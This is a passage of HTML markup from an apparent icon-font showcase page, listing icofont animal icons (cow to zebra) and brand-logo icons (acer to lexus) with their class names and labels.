		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cow-head"></i>
				</div> 
				<span> cow-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cow"></i>
				</div> 
				<span> cow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crab"></i>
				</div> 
				<span> crab </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crocodile"></i>
				</div> 
				<span> crocodile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-deer-head"></i>
				</div> 
				<span> deer-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dog-alt"></i>
				</div> 
				<span> dog-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dog-barking"></i>
				</div> 
				<span> dog-barking </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dog"></i>
				</div> 
				<span> dog </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dolphin"></i>
				</div> 
				<span> dolphin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-duck-tracks"></i>
				</div> 
				<span> duck-tracks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eagle-head"></i>
				</div> 
				<span> eagle-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eaten-fish"></i>
				</div> 
				<span> eaten-fish </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-elephant-alt"></i>
				</div> 
				<span> elephant-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-elephant-head-alt"></i>
				</div> 
				<span> elephant-head-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-elephant-head"></i>
				</div> 
				<span> elephant-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-elephant"></i>
				</div> 
				<span> elephant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-elk"></i>
				</div> 
				<span> elk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish-1"></i>
				</div> 
				<span> fish-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish-2"></i>
				</div> 
				<span> fish-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish-3"></i>
				</div> 
				<span> fish-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish-4"></i>
				</div> 
				<span> fish-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish-5"></i>
				</div> 
				<span> fish-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fish"></i>
				</div> 
				<span> fish </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fox-alt"></i>
				</div> 
				<span> fox-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fox"></i>
				</div> 
				<span> fox </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frog-tracks"></i>
				</div> 
				<span> frog-tracks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frog"></i>
				</div> 
				<span> frog </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-froggy"></i>
				</div> 
				<span> froggy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-giraffe-head-1"></i>
				</div> 
				<span> giraffe-head-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-giraffe-head-2"></i>
				</div> 
				<span> giraffe-head-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-giraffe-head"></i>
				</div> 
				<span> giraffe-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-giraffe"></i>
				</div> 
				<span> giraffe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-goat-head"></i>
				</div> 
				<span> goat-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gorilla"></i>
				</div> 
				<span> gorilla </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hen-tracks"></i>
				</div> 
				<span> hen-tracks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-horse-head-1"></i>
				</div> 
				<span> horse-head-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-horse-head-2"></i>
				</div> 
				<span> horse-head-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-horse-head"></i>
				</div> 
				<span> horse-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-horse-tracks"></i>
				</div> 
				<span> horse-tracks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jellyfish"></i>
				</div> 
				<span> jellyfish </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kangaroo"></i>
				</div> 
				<span> kangaroo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lemur"></i>
				</div> 
				<span> lemur </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lion-head-1"></i>
				</div> 
				<span> lion-head-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lion-head-2"></i>
				</div> 
				<span> lion-head-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lion-head"></i>
				</div> 
				<span> lion-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lion"></i>
				</div> 
				<span> lion </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-monkey-2"></i>
				</div> 
				<span> monkey-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-monkey-3"></i>
				</div> 
				<span> monkey-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-monkey-face"></i>
				</div> 
				<span> monkey-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-monkey"></i>
				</div> 
				<span> monkey </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-octopus-alt"></i>
				</div> 
				<span> octopus-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-octopus"></i>
				</div> 
				<span> octopus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-owl"></i>
				</div> 
				<span> owl </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-panda-face"></i>
				</div> 
				<span> panda-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-panda"></i>
				</div> 
				<span> panda </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-panther"></i>
				</div> 
				<span> panther </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-parrot-lip"></i>
				</div> 
				<span> parrot-lip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-parrot"></i>
				</div> 
				<span> parrot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paw"></i>
				</div> 
				<span> paw </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pelican"></i>
				</div> 
				<span> pelican </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-penguin"></i>
				</div> 
				<span> penguin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pig-face"></i>
				</div> 
				<span> pig-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pig"></i>
				</div> 
				<span> pig </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pigeon-1"></i>
				</div> 
				<span> pigeon-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pigeon-2"></i>
				</div> 
				<span> pigeon-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pigeon"></i>
				</div> 
				<span> pigeon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rabbit"></i>
				</div> 
				<span> rabbit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rat"></i>
				</div> 
				<span> rat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rhino-head"></i>
				</div> 
				<span> rhino-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rhino"></i>
				</div> 
				<span> rhino </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rooster"></i>
				</div> 
				<span> rooster </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-seahorse"></i>
				</div> 
				<span> seahorse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-seal"></i>
				</div> 
				<span> seal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shrimp-alt"></i>
				</div> 
				<span> shrimp-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shrimp"></i>
				</div> 
				<span> shrimp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snail-1"></i>
				</div> 
				<span> snail-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snail-2"></i>
				</div> 
				<span> snail-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snail-3"></i>
				</div> 
				<span> snail-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snail"></i>
				</div> 
				<span> snail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snake"></i>
				</div> 
				<span> snake </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-squid"></i>
				</div> 
				<span> squid </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-squirrel"></i>
				</div> 
				<span> squirrel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tiger-face"></i>
				</div> 
				<span> tiger-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tiger"></i>
				</div> 
				<span> tiger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turtle"></i>
				</div> 
				<span> turtle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-whale"></i>
				</div> 
				<span> whale </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-woodpecker"></i>
				</div> 
				<span> woodpecker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-zebra"></i>
				</div> 
				<span> zebra </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-acer"></i>
				</div> 
				<span> brand-acer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-adidas"></i>
				</div> 
				<span> brand-adidas </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-adobe"></i>
				</div> 
				<span> brand-adobe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-air-new-zealand"></i>
				</div> 
				<span> brand-air-new-zealand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-airbnb"></i>
				</div> 
				<span> brand-airbnb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-aircell"></i>
				</div> 
				<span> brand-aircell </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-airtel"></i>
				</div> 
				<span> brand-airtel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-alcatel"></i>
				</div> 
				<span> brand-alcatel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-alibaba"></i>
				</div> 
				<span> brand-alibaba </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-aliexpress"></i>
				</div> 
				<span> brand-aliexpress </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-alipay"></i>
				</div> 
				<span> brand-alipay </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-amazon"></i>
				</div> 
				<span> brand-amazon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-amd"></i>
				</div> 
				<span> brand-amd </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-american-airlines"></i>
				</div> 
				<span> brand-american-airlines </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-android-robot"></i>
				</div> 
				<span> brand-android-robot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-android"></i>
				</div> 
				<span> brand-android </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-aol"></i>
				</div> 
				<span> brand-aol </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-apple"></i>
				</div> 
				<span> brand-apple </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-appstore"></i>
				</div> 
				<span> brand-appstore </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-asus"></i>
				</div> 
				<span> brand-asus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ati"></i>
				</div> 
				<span> brand-ati </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-att"></i>
				</div> 
				<span> brand-att </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-audi"></i>
				</div> 
				<span> brand-audi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-axiata"></i>
				</div> 
				<span> brand-axiata </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-bada"></i>
				</div> 
				<span> brand-bada </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-bbc"></i>
				</div> 
				<span> brand-bbc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-bing"></i>
				</div> 
				<span> brand-bing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-blackberry"></i>
				</div> 
				<span> brand-blackberry </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-bmw"></i>
				</div> 
				<span> brand-bmw </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-box"></i>
				</div> 
				<span> brand-box </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-burger-king"></i>
				</div> 
				<span> brand-burger-king </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-business-insider"></i>
				</div> 
				<span> brand-business-insider </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-buzzfeed"></i>
				</div> 
				<span> brand-buzzfeed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-cannon"></i>
				</div> 
				<span> brand-cannon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-casio"></i>
				</div> 
				<span> brand-casio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-china-mobile"></i>
				</div> 
				<span> brand-china-mobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-china-telecom"></i>
				</div> 
				<span> brand-china-telecom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-china-unicom"></i>
				</div> 
				<span> brand-china-unicom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-cisco"></i>
				</div> 
				<span> brand-cisco </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-citibank"></i>
				</div> 
				<span> brand-citibank </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-cnet"></i>
				</div> 
				<span> brand-cnet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-cnn"></i>
				</div> 
				<span> brand-cnn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-cocal-cola"></i>
				</div> 
				<span> brand-cocal-cola </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-compaq"></i>
				</div> 
				<span> brand-compaq </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-debian"></i>
				</div> 
				<span> brand-debian </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-delicious"></i>
				</div> 
				<span> brand-delicious </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-dell"></i>
				</div> 
				<span> brand-dell </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-designbump"></i>
				</div> 
				<span> brand-designbump </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-designfloat"></i>
				</div> 
				<span> brand-designfloat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-disney"></i>
				</div> 
				<span> brand-disney </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-dodge"></i>
				</div> 
				<span> brand-dodge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-dove"></i>
				</div> 
				<span> brand-dove </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-drupal"></i>
				</div> 
				<span> brand-drupal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ebay"></i>
				</div> 
				<span> brand-ebay </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-eleven"></i>
				</div> 
				<span> brand-eleven </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-emirates"></i>
				</div> 
				<span> brand-emirates </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-espn"></i>
				</div> 
				<span> brand-espn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-etihad-airways"></i>
				</div> 
				<span> brand-etihad-airways </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-etisalat"></i>
				</div> 
				<span> brand-etisalat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-etsy"></i>
				</div> 
				<span> brand-etsy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-fastrack"></i>
				</div> 
				<span> brand-fastrack </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-fedex"></i>
				</div> 
				<span> brand-fedex </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ferrari"></i>
				</div> 
				<span> brand-ferrari </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-fitbit"></i>
				</div> 
				<span> brand-fitbit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-flikr"></i>
				</div> 
				<span> brand-flikr </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-forbes"></i>
				</div> 
				<span> brand-forbes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-foursquare"></i>
				</div> 
				<span> brand-foursquare </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-foxconn"></i>
				</div> 
				<span> brand-foxconn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-fujitsu"></i>
				</div> 
				<span> brand-fujitsu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-general-electric"></i>
				</div> 
				<span> brand-general-electric </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-gillette"></i>
				</div> 
				<span> brand-gillette </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-gizmodo"></i>
				</div> 
				<span> brand-gizmodo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-gnome"></i>
				</div> 
				<span> brand-gnome </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-google"></i>
				</div> 
				<span> brand-google </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-gopro"></i>
				</div> 
				<span> brand-gopro </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-gucci"></i>
				</div> 
				<span> brand-gucci </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hallmark"></i>
				</div> 
				<span> brand-hallmark </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hi5"></i>
				</div> 
				<span> brand-hi5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-honda"></i>
				</div> 
				<span> brand-honda </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hp"></i>
				</div> 
				<span> brand-hp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hsbc"></i>
				</div> 
				<span> brand-hsbc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-htc"></i>
				</div> 
				<span> brand-htc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-huawei"></i>
				</div> 
				<span> brand-huawei </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hulu"></i>
				</div> 
				<span> brand-hulu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-hyundai"></i>
				</div> 
				<span> brand-hyundai </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ibm"></i>
				</div> 
				<span> brand-ibm </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-icofont"></i>
				</div> 
				<span> brand-icofont </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-icq"></i>
				</div> 
				<span> brand-icq </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ikea"></i>
				</div> 
				<span> brand-ikea </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-imdb"></i>
				</div> 
				<span> brand-imdb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-indiegogo"></i>
				</div> 
				<span> brand-indiegogo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-intel"></i>
				</div> 
				<span> brand-intel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ipair"></i>
				</div> 
				<span> brand-ipair </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-jaguar"></i>
				</div> 
				<span> brand-jaguar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-java"></i>
				</div> 
				<span> brand-java </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-joomla"></i>
				</div> 
				<span> brand-joomla </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-kickstarter"></i>
				</div> 
				<span> brand-kickstarter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-kik"></i>
				</div> 
				<span> brand-kik </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lastfm"></i>
				</div> 
				<span> brand-lastfm </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lego"></i>
				</div> 
				<span> brand-lego </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lenovo"></i>
				</div> 
				<span> brand-lenovo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-levis"></i>
				</div> 
				<span> brand-levis </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lexus"></i>
				</div> 
				<span> brand-lexus </span>
			</div>
